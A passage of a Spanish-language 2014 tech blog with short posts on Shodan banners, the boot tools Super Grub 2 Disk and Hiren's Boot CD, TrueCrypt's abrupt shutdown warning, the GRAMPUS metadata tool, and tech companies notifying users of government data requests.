La mayor parte de los datos se toman de 'banners', que son los meta-datos que el servidor envía de vuelta al cliente. Esto puede ser información sobre el software del servidor, un mensaje de bienvenida o cualquier cosa que el cliente le gustaría saber antes de interactuar con el servidor.

Esto puede ser usado para encontrar todo tipo de cosas interesantes, como cámaras web, routers, centrales eléctricas, iPhones, turbinas de viento, refrigeradores - básicamente cualquier cosa conectada a Internet que tiene una banner que identifica lo que es.

30 may 2014

SUPER GRUB 2 DISK, OTRO BUEN GESTOR DE ARRENQUE MÚLTIPLE


Todo el mundo, o casi todo el mundo, cuando hablamos de un gestor de arranque múltiple nos viene a la cabeza, o por lo menos se nos pasa por la mente el LiveCD Hiren's Boot CD, todo un clásico que lleva ya mucho tiempo con nosotros desde la primera Release hasta la versión 15.2, la más actual. ¿A quién no le ha sacado de algún que otro apuro cuando nos hemos cargado intencionadamente o no el MBR?. Es una herramienta imprescindible, que para el que no la conozca le invito a que curiosee un poco, le sorprenderá gratamente.


Cómo no es "100% legal", según dicen algunas personas es sólo un 95%, debido a que contiene un conjunto de herramientas que no son todas del tipo "Freeware", o sea, no son todas gratuitas, no se puede descargar el LiveCD completo desde la web oficial, pero se puede descargar desde cualquier otra con la ayuda de Google, o desde esté link, IR.

Sin mucho más que decir al respecto del Gestor de arranque por excelencia para muchos, os presento Super Grub 2 Disk, otra muy buena opción para tenerla en cuenta, que se renueva desde su primera versión 1.98s  allá por Octubre de 2010.


29 may 2014

TRUECRYPT, ¿¿¡¡ PROYECTO CERRADO E INSEGURO !!??


TrueCrypt ya no es seguro, y además se comunica oficialmente el fin del proyecto,  eso es lo que se anuncia hoy desde su página oficial AQUÍ, la cual ahora nos redirige a otra alojada en SourceForce, donde se informa advirtiendo al público que su uso ya no es seguro, por problemas de seguridad. Cómo se puede ver en éstas dos imágenes.





Todo se produce de manera muy misteriosa, porque además de que se aconseja migrar al Bitlocker de Windows, todo esto surge después de haber terminado la primera auditoría por personal ajeno e independiente al proyecto. VER ENTRADA ANTERIOR EN EL BLOG. En la que aunque no se encontraron con nada relativamente peligroso, sí que había pequeños problemillas. Se está especulando si realmente existe algún “backdoor” en éste programa de código abierto, tal y como se apuntaba extraoficialmente. También se está especulando con que la página este robada y sea todo un bulo. Todo pronto se sabrá, de momento la noticia es esa. Además otra cosa a destacar es que con la última versión 7.2, colgada en la página de TrueCrypt, el instalador de Windows 8.1 ahora lo bloquea y no deja instalarlo, cosa que suele suceder con programas con algún tipo de malware.

Todo éste misterio aumenta porque además, Matthew Green quien ayudo en la primera auditoría al programa, no ha tenido noticias previas sobre el supuesto abandono del proyecto, el anuncio le parece auténtico y sus intentos por contactar con los responsables del proyecto, cuya identidad es hasta cierto punto secreta, no han tenido éxito.

Os aconsejo  no descargar la nueva versión 7.2, y no tocar nada más hasta que la situación se aclare. Todo es cuestión de tiempo.

Link oficial redireccionado, IR.

17 may 2014

GRAMPUS, PERFECTO PARA FORENSES Y PENTESTERS


Ya está disponible la versión beta de GRAMPUS, una herramienta escrita en Python dirigida a los pentesters y a los analistas forenses. GRAMPUS se utiliza para extraer/analizar y editar/eliminar metadatos de documentos de oficina, documentos Open Office, pdf, aplicaciones, imágenes, archivos de audio/vídeo, archivos comprimidos, etc. Grampus incluye hacking con Google y Shodan para encontrar documentos públicos en un sitio web y permite descargar y analizar los documentos encontrados.



Repositorio en Bitbucket, AQUÍ.
Descargas, AQUÍ.
Source, AQUÍ.
Twitter, IR.

Guías de usuario: 

ESPAÑOL, AQUÍ.
INGLES, AQUÍ.


6 may 2014

APPLE, FACEBOOK, MICROSOFT Y GOOGLE SE UNEN A YAHOO


Ya lo hizo Yahoo hace tiempo, concretamente en Junio de 2013, y ahora se le unen otros grandes del sector, modificando y/o añadiendo nuevas politicas de servicio, en las que notificaran ( o eso dicen...), cuando un gobierno solicite información detallada personal sobre un usuario.


Todo viene a raiz de las polémicas filtraciones de Edward Snowden sobre la vigilancia masiva que ha sufrido todo el mundo, o casi todo.

También se comenta que ahora los ciberdelincuentes tienen más tiempo de reacción, pudiendo escapar incluso tras cometer algun delito. Sería como si alguien robara algo en un supermercado, y tras llegar a casa, le llamara la policia avisandole de que van a ir a detenerlo, lógicamente para el delincuente mucho mejor. Pero en este mundo virtual nunca esta de más que se nos informe cuando alguien, a nuestras espaldas, está solicitando e incluso almacenando información personal sin nuestro consentimiento. Se puede tomar por el lado positivo o negativo, yo me decanto por el primero.